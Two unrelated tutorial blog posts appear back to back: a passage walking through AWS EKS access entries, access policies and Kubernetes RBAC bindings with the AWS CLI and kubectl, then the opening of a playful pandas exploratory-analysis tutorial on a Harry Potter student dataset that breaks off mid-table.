- [Kubernetes: part 4 — AWS EKS authentication, aws-iam-authenticator and AWS IAM](https://rtfm.co.ua/en/kubernetes-part-4-aws-eks-authentification-aws-iam-authenticator-and-aws-iam/)
- [AWS Elastic Kubernetes Service: RBAC Authorization via AWS IAM and RBAC Groups](https://rtfm.co.ua/en/aws-elastic-kubernetes-service-rbac-authorization-via-aws-iam-and-rbac-groups/)
- [AWS: EKS, OpenID Connect, and ServiceAccounts](https://rtfm.co.ua/en/aws-eks-openid-connect-and-serviceaccounts/)

### How does it work?

Previously, we had a special `aws-auth` ConfigMap that described WorkerNodes IAM Roles, all our users, roles, and groups.

From now on, we can manage access to EKS directly through the EKS API using AWS IAM as an authenticator. That is, the user logs in to AWS, AWS performs authentication — checks that it is the user he or she claims to be, and then, when the user connects to Kubernetes, the Kubernetes cluster performs authorization — checking permissions to the cluster, and in the cluster itself.

At the same time, this scheme works perfectly with Kubernetes’ RBAC.

And another significant detail is that we can finally get rid of the “default root user” — the hidden cluster administrator on whose behalf the cluster was created. And before, we couldn’t see or change it anywhere, which sometimes caused problems.

So, if earlier we had to manage the entries in the `aws-auth` ConfigMap ourselves, and God forbid it should be broken (that happened to me a few times), now we can move access control to dedicated Terraform code, and access control is much easier and less risky.
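For reference, a typical `aws-auth` ConfigMap looked something like this (a minimal sketch; the account ID and role/user names are placeholders, not from a real cluster):

```yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-auth
  namespace: kube-system
data:
  mapRoles: |
    # WorkerNodes IAM Role, so nodes can join the cluster
    - rolearn: arn:aws:iam::111122223333:role/eks-node-group-role
      username: system:node:{{EC2PrivateDNSName}}
      groups:
        - system:bootstrappers
        - system:nodes
  mapUsers: |
    # A human user mapped to the cluster-admin RBAC group
    - userarn: arn:aws:iam::111122223333:user/devops-user
      username: devops-user
      groups:
        - system:masters
```

One broken edit to this single ConfigMap could lock everyone out of the cluster, which is exactly the risk the new API removes.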
### Changes in IAM and EKS

Now we have two new entities in EKS —  **_Access entries_** and **_Access policies_** :

- **Amazon EKS Access Entries**  — an entry in EKS about an object that is associated with an AWS IAM role or user  — describes the type (a regular user, EC2, etc.), Kubernetes RBAC Groups, or EKS Access Policy
- **Amazon EKS Access Policy**  — a policy in EKS that describes the permissions for EKS Access Entries. And these are EKS policies — you won’t find them in IAM.

Currently, there are 4 EKS Access Policies that we can use, and they are similar to the default [User-facing ClusterRoles in Kubernetes](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles):

- `AmazonEKSClusterAdminPolicy` - cluster-admin
- `AmazonEKSAdminPolicy` - admin
- `AmazonEKSEditPolicy` - edit
- `AmazonEKSViewPolicy` - view

I guess that somewhere under the hood, these EKS Access Policies are simply mapped to Kubernetes ClusterRoles.

We connect these policies to the IAM Role or IAM user, and when connecting to the Kubernetes cluster, EKS Authorizer checks which permissions this user has.

Schematically, this can be represented as follows:

![](https://cdn-images-1.medium.com/max/1024/0*Y0wmaLoiZK62AQn7.png)

Or this scheme, from the [AWS A deep dive into simplified Amazon EKS access management controls](https://aws.amazon.com/blogs/containers/a-deep-dive-into-simplified-amazon-eks-access-management-controls/) blog:

![](https://cdn-images-1.medium.com/max/879/0*tY6hc50SsjweFUte.png)

Instead of attaching a default AWS-managed EKS Access Policy, when creating an EKS Access Entry we can specify a name of a Kubernetes RBAC Group, and then the Kubernetes RBAC mechanism will be used instead of the EKS Authorizer — we’ll see how it works in this post.

For Terraform, in the [`terraform-provider-aws`](https://github.com/hashicorp/terraform-provider-aws/tree/v5.33.0) version 5.33.0, two new corresponding resource types were added — `aws_eks_access_entry` and `aws_eks_access_policy_association`. But now we will do everything manually.

### Configuring the Cluster access management API

We will check how it works on an existing cluster version 1.28.

Open the cluster settings, the Access tab, click on the Manage access button:

![](https://cdn-images-1.medium.com/max/1024/0*7p9Ueq4Bn523LReB.png)

Here, we have the _ConfigMap_ enabled (the aws-auth) - change it to _EKS API and ConfigMap._ This way we will keep the old mechanism and can test the new one (you can also do this in Terraform):

![](https://cdn-images-1.medium.com/max/655/0*U-M44uMjvbRznQ_U.png)

Note the warning: “_Once you modify a cluster to use the EKS access entry API, you cannot change it back to ConfigMap only_”. But [`terraform-aws-modules/eks`](https://registry.terraform.io/modules/terraform-aws-modules/eks/aws/latest) version 19.21 ignores these changes and works fine, so you can change it here.

Now, the cluster will authorize users from both the `aws-auth` ConfigMap and the EKS Access Entry API, with preference for the Access Entry API.

After switching to the EKS Access Entry API, we immediately have new EKS Access Entries:

![](https://cdn-images-1.medium.com/max/1024/0*qTwDUYnyAWOYdiyT.png)

And only now we can see the “hidden root user” mentioned above — the `assumed-role/tf-admin` in my case, because Terraform works by using that IAM role, and in my setup it was done exactly because of this AWS/EKS mechanism, which can now be removed.
But not everything is taken from the current `aws-auth` ConfigMap: the role for WorkerNodes is there, but the rest of the entries (users from `mapUsers` and roles from `mapRoles`) are not automatically added. However, when you change the `API_AND_CONFIG_MAP` parameter through Terraform, it seems to happen - we'll check later. ### Adding a new IAM User to the EKS cluster You can check existing EKS Access Entries from the AWS CLI with the [`aws eks list-access-entries`](https://docs.aws.amazon.com/cli/latest/reference/eks/list-access-entries.html) command: ``` $ aws --profile work eks list-access-entries --cluster-name atlas-eks-test-1-28-cluster { "accessEntries": [ "arn:aws:iam::492***148:role/test-1-28-default-eks-node-group-20240702094849283200000002", "arn:aws:iam::492***148:role/tf-admin" ] } ``` Let’s add a new IAM User with access to the cluster. Create the user: ![](https://cdn-images-1.medium.com/max/624/0*8U9woRr3Lga1y_c3.png) In Set permissions, don’t select anything, just click Next: ![](https://cdn-images-1.medium.com/max/870/0*8rMPb7HhNAHkvLKa.png) Create an Access Key — we will use this user from the AWS CLI to generate the `kubectl` config: ![](https://cdn-images-1.medium.com/max/1024/0*5rpbWNvFe-wKCA5D.png) ![](https://cdn-images-1.medium.com/max/944/0*-uWexTwT3OGAZtX5.png) Add permission to `eks:DescribeCluster`: ![](https://cdn-images-1.medium.com/max/1024/0*QLf69wMmNj_7v0Qb.png) ``` { "Version": "2012-10-17", "Statement": [ { "Sid": "Statement1", "Effect": "Allow", "Action": ["eks:DescribeCluster"], "Resource": ["*"] } ] } ``` ![](https://cdn-images-1.medium.com/max/1024/0*N-t00sT6YbEPS1Am.png) Save and create a new AWS CLI profile: ``` $ vim -p ~/.aws/config ~/.aws/credentials ``` Add the profile to `~/.aws/config`: ``` [profile test-eks] region = us-east-1 output = json ``` And the keys to the `~/.aws/credentials`: ``` [test-eks] aws_access_key_id = AKI***IMN aws_secret_access_key = Kdh***7wP ``` Create a new `kubectl context`: ``` $ aws --profile test-eks eks update-kubeconfig --name atlas-eks-test-1-28-cluster --alias test-cluster-test-user Updated context test-cluster-test-user in /home/setevoy/.kube/config ``` We’re done with the IAM User, and now we need to connect it to the EKS cluster. ### EKS: adding an Access Entry We can do it either through the AWS Console: ![](https://cdn-images-1.medium.com/max/1024/0*9bh36vIK821HIXeV.png) Or with the AWS CLI (with a working profile, not a new one, because it has no rights) and the [`aws eks create-access-entry`](https://docs.aws.amazon.com/cli/latest/reference/eks/create-access-entry.html) command. In the parameters, pass the cluster name and the ARN of the IAM User or IAM Role that we are connecting to the cluster (but it would probably be more correct to say “_for which we are creating an entry point to the cluster_”, because the entity is called _Access Entry_): ``` $ aws --profile work eks create-access-entry --cluster-name atlas-eks-test-1-28-cluster --principal-arn arn:aws:iam::492***148:user/test-eks-acess-TO-DEL { "accessEntry": { "clusterName": "atlas-eks-test-1-28-cluster", "principalArn": "arn:aws:iam::492***148:user/test-eks-acess-TO-DEL", "kubernetesGroups": [], "accessEntryArn": "arn:aws:eks:us-east-1:492 ***148:access-entry/atlas-eks-test-1-28-cluster/user/492*** 148/test-eks-acess-TO-DEL/98c8398d-9494-c9f3-2bfc-86e07086c655", ... 
"username": "arn:aws:iam::492***148:user/test-eks-acess-TO-DEL", "type": "STANDARD" } } ``` Let’s take another look at the AWS Console: ![](https://cdn-images-1.medium.com/max/1024/0*q40plKHzc70_cWgQ.png) A new Entry is added, moving on. ### Adding an EKS Access Policy Now we still don’t have access to the cluster with the new user, because there is no EKS Policy connected to it — the Access policies field is empty. Check with the `kubectl auth can-i`: ``` $ kubectl auth can-i get pod no ``` You can add an EKS Access Policy in the AWS Console: ![](https://cdn-images-1.medium.com/max/1024/0*iJ0Lqo0u8tpt-qrr.png) Or again, with the AWS CLI and the [`aws eks associate-access-policy`](https://docs.aws.amazon.com/cli/latest/reference/eks/associate-access-policy.html) command. Let’s add the `AmazonEKSViewPolicy` for now: ``` $ aws --profile work eks associate-access-policy --cluster-name atlas-eks-test-1-28-cluster \ > --principal-arn arn:aws:iam::492***148:user/test-eks-acess-TO-DEL \ > --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSViewPolicy \ > --access-scope type=cluster { "clusterName": "atlas-eks-test-1-28-cluster", "principalArn": "arn:aws:iam::492***148:user/test-eks-acess-TO-DEL", "associatedAccessPolicy": { "policyArn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSViewPolicy", "accessScope": { "type": "cluster", "namespaces": [] }, ... } ``` Pay attention to the `--access-scope type=cluster` - now we have granted the ReadOnly rights to the entire cluster, but we can limit it to a specific namespace(s), will try it later in this post. Check the Policies in the AWS Console: ![](https://cdn-images-1.medium.com/max/750/0*-U-neU6ahCzwDfI8.png) The Access Policy is added Check with the `kubectl`: ``` $ kubectl auth can-i get pod yes ``` But we can’t create a Kubernetes Pod because we have ReadOnly rights: ``` $ kubectl auth can-i create pod no ``` Other useful commands for the AWS CLI: - [`aws eks disassociate-access-policy`](https://docs.aws.amazon.com/cli/latest/reference/eks/disassociate-access-policy.html) - [`aws eks list-associated-access-policies`](https://docs.aws.amazon.com/cli/latest/reference/eks/list-associated-access-policies.html) ### Removing the EKS default root user In the future, you can disable the creation of such a user when creating a cluster with `aws eks create-cluster` by setting `bootstrapClusterCreatorAdminPermissions=false`. Now let’s replace it — give our test user admin permissions, and remove the default root user. Run again `aws eks associate-access-policy`, but now in the `--policy-arn` we specify the `AmazonEKSClusterAdminPolicy`: ``` $ aws --profile work eks associate-access-policy --cluster-name atlas-eks-test-1-28-cluster \ > --principal-arn arn:aws:iam::492***148:user/test-eks-acess-TO-DEL \ > --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy \ > --access-scope type=cluster ``` What about the permissions? ``` $ kubectl auth can-i create pod yes ``` Good, we can anything. Also, now we have two cluster-admins: ![](https://cdn-images-1.medium.com/max/1024/0*thtMqflVOKfuK9i6.png) And we can delete the old one: ``` $ aws --profile work eks delete-access-entry --cluster-name atlas-eks-test-1-28-cluster --principal-arn arn:aws:iam::492***148:role/tf-admin ``` ### Namespaced EKS Access Entry Instead of granting permissions to the entire cluster with the `--access-scope type=cluster`, we can make a user an admin only in specific namespaces. 
Let’s take another regular IAM User and make him an admin in only one Kubernetes Namespace.

Create a new namespace:

```
$ kk create ns test-ns
namespace/test-ns created
```

Create a new EKS Access Entry for my AWS IAM User:

```
$ aws --profile work eks create-access-entry --cluster-name atlas-eks-test-1-28-cluster --principal-arn arn:aws:iam::492***148:user/arseny
```

And connect the `AmazonEKSEditPolicy`, but in the `--access-scope` we set the type `namespace` and specify the name of the namespace:

```
$ aws --profile work eks associate-access-policy --cluster-name atlas-eks-test-1-28-cluster \
> --principal-arn arn:aws:iam::492***148:user/arseny \
> --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSEditPolicy \
> --access-scope type=namespace,namespaces=test-ns
```

In the [`access-scope`](https://docs.aws.amazon.com/cli/latest/reference/eks/associate-access-policy.html#options) we can specify either cluster or namespace. Not very flexible - but for flexibility we have the Kubernetes RBAC.

Generate a new `kubectl context` from the `--profile work`, where _profile work_ is my regular AWS User for which we created an EKS Access Entry with `AmazonEKSEditPolicy`:

```
$ aws --profile work eks update-kubeconfig --name atlas-eks-test-1-28-cluster --alias test-cluster-arseny-user
Updated context test-cluster-arseny-user in /home/setevoy/.kube/config
```

Check the active `kubectl context`:

```
$ kubectl config current-context
test-cluster-arseny-user
```

And check the permissions. First in the `default` Namespace:

```
$ kubectl --namespace default auth can-i create pod
no
```

And in a testing namespace:

```
$ kubectl --namespace test-ns auth can-i create pod
yes
```

Nice! “It works!” ©

### EKS Access Entry, and Kubernetes RBAC

Instead of connecting AWS’s EKS Access Policy, of which there are only four, we can use the common [Kubernetes Role-Based Access Control](https://kubernetes.io/docs/reference/access-authn-authz/rbac/), RBAC.

Then, it will look like the following:

1. in EKS, create an Access Entry
2. in the Access Entry parameters, specify the Kubernetes RBAC Group
3. and then, as usual, we use the RBAC Group and a Kubernetes RoleBinding

Then we’ll authenticate with AWS, after which AWS will “pass us over” to Kubernetes, and it will perform authorization — checking our permissions in the cluster — based on our RBAC group.

Delete the created Access Entry for my IAM User:

```
$ aws --profile work eks delete-access-entry --cluster-name atlas-eks-test-1-28-cluster --principal-arn arn:aws:iam::492***148:user/arseny
```

Create it again, but now add the `--kubernetes-groups` parameter:

```
$ aws --profile work eks create-access-entry --cluster-name atlas-eks-test-1-28-cluster \
> --principal-arn arn:aws:iam::492***148:user/arseny \
> --kubernetes-groups test-eks-rbac-group
```

Check in the AWS Console:

![](https://cdn-images-1.medium.com/max/1024/0*2VabEB2zZdT8rbAl.png)

Check the permissions with `kubectl`:

```
$ kubectl --namespace test-ns auth can-i create pod
no
```

Because we didn’t add an EKS Access Policy, and we didn’t do anything in RBAC.
Let’s create a manifest with a RoleBinding, and bind the RBAC group `test-eks-rbac-group` to the default Kubernetes `edit` ClusterRole:

```
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: test-eks-rbac-binding
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: edit
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: test-eks-rbac-group
```

Switch the `kubectl` context to our admin (I use [`kubectx`](https://github.com/ahmetb/kubectx) for this):

```
$ kx
✔ Switched to context "test-cluster-test-user".
```

And create a RoleBinding in the `test-ns` namespace to give the _Edit_ permissions for our user only in this namespace:

```
$ kubectl --namespace test-ns apply -f test-rbac.yml
rolebinding.rbac.authorization.k8s.io/test-eks-rbac-binding created
```

Switch to the `arseny` user:

```
$ kx
✔ Switched to context "test-cluster-arseny-user".
```

And again, check the permissions in two namespaces:

```
$ kubectl --namespace default auth can-i create pod
no

$ kubectl --namespace test-ns auth can-i create pod
yes
```

RBAC is working.

Now that we have seen how the Access Management API mechanism works and its main features in action, we can move on to Terraform. That will be my next post.

_Originally published at_ [_RTFM: Linux, DevOps, and system administration_](https://rtfm.co.ua/en/aws-kubernetes-and-access-management-api-the-new-authentification-in-eks/)_._

* * *
setevoy
1,916,548
The Gemika's Magical Guide to Sorting Hogwarts Students using the Decision Tree Algorithm (Part #4A)
4A. Unveiling the Mysteries: Data Exploration (EDA) 🔍 Welcome back to the enchanting halls...
27,991
2024-07-17T06:31:30
https://dev.to/gerryleonugroho/the-gemikas-magical-guide-to-sorting-hogwarts-students-using-the-decision-tree-algorithm-part-4a-4n3n
machinelearning, ai, harrypotter, python
## 4A. Unveiling the Mysteries: Data Exploration (EDA) 🔍

Welcome back to the enchanting halls of Hogwarts, dear sorcerers! As we continue our magical journey into the world of data science, it's time to unveil the **mysteries hidden** within our dataset. In this chapter, we'll embark on a series of explorations that will reveal the secrets of our enchanted scroll (or **dataset**). Think of this as delving into the depths of the [Room of Requirement](https://harrypotter.fandom.com/wiki/Room_of_Requirement), where each discovery leads us to greater understanding. ✨🧙‍♂️

### **4A.1 Inspecting First Few Rows**

Our first step is to take a glimpse at the first few rows of our dataset, much like opening the [Marauder's Map](https://harrypotter.fandom.com/wiki/Marauder%27s_Map) for the first time. This will give us an initial understanding of the structure and contents of our data.

```python
import pandas as pd  # Our trusty spellbook for data wrangling

# Inspecting the first few rows of the dataset
dataset_path = 'data/hogwarts-students.csv'  # Path to our dataset
hogwarts_df = pd.read_csv(dataset_path)
print(hogwarts_df.head())
```

```
               name  gender  age   origin                      specialty  \
0      Harry Potter    Male   11  England  Defense Against the Dark Arts
1  Hermione Granger  Female   11  England                Transfiguration
2       Ron Weasley    Male   11  England                          Chess
3      Draco Malfoy    Male   11  England                        Potions
4     Luna Lovegood  Female   11  Ireland                      Creatures

        house blood_status  pet wand_type              patronus  \
0  Gryffindor   Half-blood  Owl     Holly                  Stag
1  Gryffindor  Muggle-born  Cat      Vine                 Otter
2  Gryffindor   Pure-blood  Rat       Ash  Jack Russell Terrier
3   Slytherin   Pure-blood  Owl  Hawthorn                   NaN
4   Ravenclaw   Half-blood  NaN       Fir                  Hare

  quidditch_position         boggart                 favorite_class  \
0             Seeker        Dementor  Defense Against the Dark Arts
1                NaN         Failure                     Arithmancy
2             Keeper          Spider                         Charms
3             Seeker  Lord Voldemort                        Potions
4                NaN      Her mother                      Creatures

   house_points
0         150.0
1         200.0
2          50.0
3         100.0
4         120.0
```

As we peer into these rows, we see a variety of features such as **student names**, **house affiliations**, and **various traits**. Each **row is a story**, each **column a chapter**. We might notice, for example, that **Harry, Hermione, and Ron** are all in **_Gryffindor_**, characterized by their bravery and determination. This initial inspection helps us understand the scope and scale of our dataset.

---

### **4A.2 Checking Dataset Features**

Next, we delve deeper into the columns of our DataFrame, much like how Hermione would meticulously study her textbooks. Each column represents a different feature of our students, from their house to their magical abilities.

```python
# Displaying the columns of the dataset
print(hogwarts_df.columns)
```

As the magic spell finishes its wizardry, it reveals the following **hidden artifacts**.

```
Index(['name', 'gender', 'age', 'origin', 'specialty', 'house',
       'blood_status', 'pet', 'wand_type', 'patronus', 'quidditch_position',
       'boggart', 'favorite_class', 'house_points'],
      dtype='object')
```

```python
# Displaying how many rows and columns are in the dataset
print(hogwarts_df.shape)
```

And you're guessing correctly, sorcerers: the dataset consists of 52 rows and 14 columns. ✨🌟

```
(52, 14)
```

Let us explore these features, each as significant as a spell component in a well-crafted incantation:

- **Name**: The given name of our witch or wizard, from the illustrious Harry Potter to the enigmatic Luna Lovegood. 🌟
- **Gender**: Whether they are a young wizard or witch, reflecting the diversity of Hogwarts.
- **Age**: Their age at the time of sorting, for even the youngest students have their place in the castle's storied history.
- **Origin**: The place they hail from, be it the rolling hills of England, the rugged highlands of Scotland, or the enchanting isles of Ireland. 🏞️
- **Specialty**: Their area of magical expertise, such as Potions, Transfiguration, or Defense Against the Dark Arts, much like Professor Snape’s mastery of the subtle art of potion-making.
- **House**: The revered house to which they belong—Gryffindor, Hufflepuff, Ravenclaw, or Slytherin—each with its own rich traditions and values.
- **Blood Status**: Whether they are Pure-blood, Half-blood, or Muggle-born, a detail that, while significant in the wizarding world, never diminishes their magical potential.
- **Pet**: Their chosen magical companion, be it an owl, a cat, or a toad, reminiscent of Harry's loyal Hedwig or Hermione's clever Crookshanks. 🦉🐈
- **Wand Type**: The wood and core of their wand, the very tool of their magical prowess.
- **Patronus**: The form their Patronus takes, a magical manifestation of their innermost self, like Harry's proud stag or Snape's ethereal doe. 🦌
- **Quidditch Position**: Their role in the beloved wizarding sport, whether Seeker, Chaser, Beater, or Keeper, or perhaps no position at all.
- **Boggart**: The form their Boggart takes, a glimpse into their deepest fears.
- **Favorite Class**: The subject they excel in or enjoy the most, akin to Hermione's love for Arithmancy or Neville's talent in Herbology.
- **House Points**: Points they have contributed to their house, reflecting their achievements and misadventures alike.

With this compendium of magical features, we craft our dataset with the precision of a spell-wright composing a new enchantment. Each character's details are meticulously recorded, ensuring that our data is as rich and detailed as the tapestry of Hogwarts itself.🧙‍♂️🏰

By examining these features, we gain a deeper understanding of the dataset's richness, much like a wizard learning about the different properties of magical creatures. As we assemble this treasure trove of information, we prepare ourselves for the next step in our magical journey—transforming these attributes into the foundations upon which our **Decision Tree** algorithm will cast its spell. Let us proceed, dear sorcerers, for the magic is only just beginning.✨🧙‍♂️

---

### **4A.3 Inspecting Data Types**

With a clear understanding of our features, we now turn our attention to the data types. This step is akin to examining the ingredients of a potion, ensuring each component is appropriate for its intended use.

```python
# Checking the data types of each column
print(hogwarts_df.dtypes)
```

And in return, the previous magic spell yields us, dear sorcerers, the following incantations.

```
name                   object
gender                 object
age                     int64
origin                 object
specialty              object
house                  object
blood_status           object
pet                    object
wand_type              object
patronus               object
quidditch_position     object
boggart                object
favorite_class         object
house_points          float64
dtype: object
```

_Wow_, would you look at that: we've just discovered quite a few data type inconsistencies within the dataset. The data types tell us whether each column contains numerical values, text, or other forms of data. For instance, **Age should be a `numerical type`**, while **`Name`** and **`House`** are **`text (or string)`** types. Ensuring these types are correct is crucial for our subsequent analyses and visualizations.
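Before we fix anything, here is a quick charm to list which columns Pandas has read in as plain `object` (text) types; these are the prime suspects for conversion (a small illustrative snippet, not from the original scroll):

```python
# List the columns that Pandas read as generic 'object' (text) dtypes;
# these are the candidates to convert to numeric or categorical types
object_columns = hogwarts_df.select_dtypes(include='object').columns.tolist()
print(object_columns)
```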
---

### **4A.4 Incorrect Data Type**

Occasionally, we may find discrepancies in the data types, much like finding a rogue ingredient in a potion. Correcting these mismatches is essential to ensure the accuracy of our spells (or analyses). So let's just spin our wands (or should I say, Jupyter Lab), and try to fix them this time.

```python
# Converting data types if necessary
# First, let's check the columns again to identify the correct names
print(hogwarts_df.columns)

# Assuming we identified 'age' as the correct column name for age
hogwarts_df['age'] = pd.to_numeric(hogwarts_df['age'], errors='coerce')  # Ensure Age is numeric

# Ensuring 'gender' is categorical
hogwarts_df['gender'] = hogwarts_df['gender'].astype('category')  # Ensure Gender is categorical

# Ensuring 'specialty' is categorical
hogwarts_df['specialty'] = hogwarts_df['specialty'].astype('category')  # Ensure specialty is categorical

# Ensuring 'house' is categorical
hogwarts_df['house'] = hogwarts_df['house'].astype('category')  # Ensure house is categorical

# Ensuring 'blood_status' is categorical
hogwarts_df['blood_status'] = hogwarts_df['blood_status'].astype('category')  # Ensure blood_status is categorical

# Ensuring 'pet' is categorical
hogwarts_df['pet'] = hogwarts_df['pet'].astype('category')  # Ensure pet is categorical

# Ensuring 'wand_type' is categorical
hogwarts_df['wand_type'] = hogwarts_df['wand_type'].astype('category')  # Ensure wand_type is categorical

# Ensuring 'quidditch_position' is categorical
hogwarts_df['quidditch_position'] = hogwarts_df['quidditch_position'].astype('category')  # Ensure quidditch_position is categorical

# Ensuring 'favorite_class' is categorical
hogwarts_df['favorite_class'] = hogwarts_df['favorite_class'].astype('category')  # Ensure favorite_class is categorical
```

By casting these spells, we ensure that each column is of the appropriate type, ready for further exploration and manipulation. This step is much like Snape meticulously adjusting the ingredients of a complex potion to achieve the perfect brew.

Now, once we've cast the previous spell, Jupyter yields the following updated results.

```
Index(['name', 'gender', 'age', 'origin', 'specialty', 'house',
       'blood_status', 'pet', 'wand_type', 'patronus', 'quidditch_position',
       'boggart', 'favorite_class', 'house_points'],
      dtype='object')
```

Now let's verify that the previous spell has worked its magical course on our dataset by invoking the following spell again.

```python
# Verify the data types after conversion
print(hogwarts_df.dtypes)
```

```
name                    object
gender                category
age                      int64
origin                  object
specialty             category
house                 category
blood_status          category
pet                   category
wand_type             category
patronus                object
quidditch_position    category
boggart                 object
favorite_class        category
house_points           float64
dtype: object
```

---

### **4A.5 Spells and Charms to Convert Data Types**

In case you, dear sorcerers, are wondering how many data types Pandas is capable of supporting, the following is the full list of them, along with the ways to convert each one.
| Data Type | Description | Example Values | Conversion Method |
|-----------|-------------|----------------|--------------------|
| **int64** | Integer values | 1, 2, 3, -5, 0 | `pd.to_numeric(df['column'])` |
| **float64** | Floating point numbers | 1.0, 2.5, -3.4, 0.0 | `pd.to_numeric(df['column'])` |
| **bool** | Boolean values | True, False | `df['column'].astype('bool')` |
| **object** | String values | 'apple', 'banana', '123' | `df['column'].astype('str')` |
| **datetime64[ns]** | Date and time values | '2024-07-17', '2023-01-01 12:00' | `pd.to_datetime(df['column'])` |
| **timedelta[ns]** | Differences between datetimes | '1 days 00:00:00', '2 days 03:04:05' | `pd.to_timedelta(df['column'])` |
| **category** | Categorical data | 'A', 'B', 'C' | `df['column'].astype('category')` |

---

### **4A.6 Reinvestigate The Data Type in The Dataset**

Having ensured the correctness of our data types, it's time to take a more comprehensive look at our dataset. This step is akin to casting a revealing charm over a hidden room, allowing us to see everything at once.

```python
# Displaying a summary of all the data types
print(hogwarts_df.info())
```

By previewing the whole dataset, we gain a holistic view of its structure, contents, and summary statistics. This comprehensive overview helps us identify any remaining inconsistencies or areas that require further attention, much like a careful sweep of the castle grounds to ensure everything is in order, as the following results show.

```
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 52 entries, 0 to 51
Data columns (total 14 columns):
 #   Column              Non-Null Count  Dtype
---  ------              --------------  -----
 0   name                52 non-null     object
 1   gender              52 non-null     category
 2   age                 52 non-null     int64
 3   origin              52 non-null     object
 4   specialty           52 non-null     category
 5   house               52 non-null     category
 6   blood_status        52 non-null     category
 7   pet                 27 non-null     category
 8   wand_type           52 non-null     category
 9   patronus            50 non-null     object
 10  quidditch_position  10 non-null     category
 11  boggart             52 non-null     object
 12  favorite_class      51 non-null     category
 13  house_points        50 non-null     float64
dtypes: category(8), float64(1), int64(1), object(4)
memory usage: 6.8+ KB
None
```

### **4A.7 Detailed Summary of Dataset**

And here's the interesting part: where the previous spells gave a high-level overview, this time the spell gives us detailed statistics about the dataset. It's a bit statistical for sure, but fear not, dear sorcerers; as you scroll forward, you'll notice a couple of other stunning facts about the Hogwarts students.
```
print(hogwarts_df.describe(include='all'))  # Providing a detailed summary of the dataset
```

```
                name gender        age   origin specialty       house  \
count             52     52  52.000000       52        52          52
unique            52      2        NaN        9        24           6
top     Harry Potter   Male        NaN  England    Charms  Gryffindor
freq               1     27        NaN       35         7          18
mean             NaN    NaN  14.942308      NaN       NaN         NaN
std              NaN    NaN   2.492447      NaN       NaN         NaN
min              NaN    NaN  11.000000      NaN       NaN         NaN
25%              NaN    NaN  13.250000      NaN       NaN         NaN
50%              NaN    NaN  16.000000      NaN       NaN         NaN
75%              NaN    NaN  17.000000      NaN       NaN         NaN
max              NaN    NaN  18.000000      NaN       NaN         NaN

       blood_status  pet wand_type       patronus quidditch_position  boggart  \
count            52   27        52             50                 10       52
unique            4    9        28             15                  5       11
top      Half-blood  Owl       Fir  Non-corporeal             Seeker  Failure
freq             25   11         4             34                  5       40
mean            NaN  NaN       NaN            NaN                NaN      NaN
std             NaN  NaN       NaN            NaN                NaN      NaN
min             NaN  NaN       NaN            NaN                NaN      NaN
25%             NaN  NaN       NaN            NaN                NaN      NaN
50%             NaN  NaN       NaN            NaN                NaN      NaN
75%             NaN  NaN       NaN            NaN                NaN      NaN
max             NaN  NaN       NaN            NaN                NaN      NaN

       favorite_class house_points
count              51    50.000000
unique             21          NaN
top            Charms          NaN
freq                8          NaN
mean              NaN   119.200000
std               NaN    54.129097
min               NaN    10.000000
25%               NaN    72.500000
50%               NaN   125.000000
75%               NaN   160.000000
max               NaN   200.000000
```

From the summary, we can infer several interesting points:

- House Distribution: Gryffindor has the highest count with 18 students, showing its prominence.
- Age: The average age of students is around 14.94 years, with the youngest being 11 and the oldest 18.
- Gender: The dataset includes 27 males and 25 females, showing a fairly balanced gender distribution.
- Blood Status: Half-bloods are the most common, with 25 occurrences, indicating a diverse student body.
- Wands and Pets: There are 28 unique wand types and 9 different pet types, reflecting the unique personalities and preferences of the students.
- Quidditch: Only a few students play Quidditch, with Seeker being the most common position.
- Favorite Class: Charms is the most favored class among students, with 8 mentions.
- House Points: The average house points are 119.2, with a standard deviation of 54.13, indicating a wide range of performance.

---

### **4A.8 Preview All the Values in the Dataset**

For the curious minds whose thoughts fly as fast as their broomsticks, here's the magic spell to display every value within the dataset.
``` # Displaying a summary of the entire dataset print(hogwarts_df.to_string()) ``` ``` name gender age origin specialty house blood_status pet wand_type patronus quidditch_position boggart favorite_class house_points 0 Harry Potter Male 11 England Defense Against the Dark Arts Gryffindor Half-blood Owl Holly Stag Seeker Dementor Defense Against the Dark Arts 150.0 1 Hermione Granger Female 11 England Transfiguration Gryffindor Muggle-born Cat Vine Otter NaN Failure Arithmancy 200.0 2 Ron Weasley Male 11 England Chess Gryffindor Pure-blood Rat Ash Jack Russell Terrier Keeper Spider Charms 50.0 3 Draco Malfoy Male 11 England Potions Slytherin Pure-blood Owl Hawthorn NaN Seeker Lord Voldemort Potions 100.0 4 Luna Lovegood Female 11 Ireland Creatures Ravenclaw Half-blood NaN Fir Hare NaN Her mother Creatures 120.0 5 Neville Longbottom Male 11 England Herbology Gryffindor Pure-blood Toad Cherry Non-corporeal NaN Severus Snape Herbology 70.0 6 Ginny Weasley Female 11 England Defense Against the Dark Arts Gryffindor Pure-blood Owl Yew Horse Chaser Tom Riddle Defense Against the Dark Arts 140.0 7 Cedric Diggory Male 15 England Quidditch Hufflepuff Pure-blood NaN Ash Non-corporeal Seeker Failure Defense Against the Dark Arts 160.0 8 Cho Chang Female 14 Scotland Charms Ravenclaw Half-blood Owl Hazel Swan Seeker Failure Charms 110.0 9 Severus Snape Male 16 England Potions Slytherin Half-blood NaN Elm Doe NaN Lily Potter Potions 90.0 10 Albus Dumbledore Male 17 England Transfiguration Gryffindor Half-blood Phoenix Elder Phoenix NaN Ariana's death Transfiguration 200.0 11 Minerva McGonagall Female 16 Scotland Transfiguration Gryffindor Half-blood Cat Fir Cat NaN Failure Transfiguration 190.0 12 Bellatrix Lestrange Female 15 England Dark Arts Slytherin Pure-blood NaN Walnut NaN Azkaban Dueling 80 NaN 13 Nymphadora Tonks Female 14 Wales Metamorphmagus Hufflepuff Half-blood Owl Blackthorn Wolf NaN Failure Defense Against the Dark Arts 130.0 14 Remus Lupin Male 16 England Defense Against the Dark Arts Gryffindor Half-blood Dog Cypress Non-corporeal NaN Full Moon Defense Against the Dark Arts 150.0 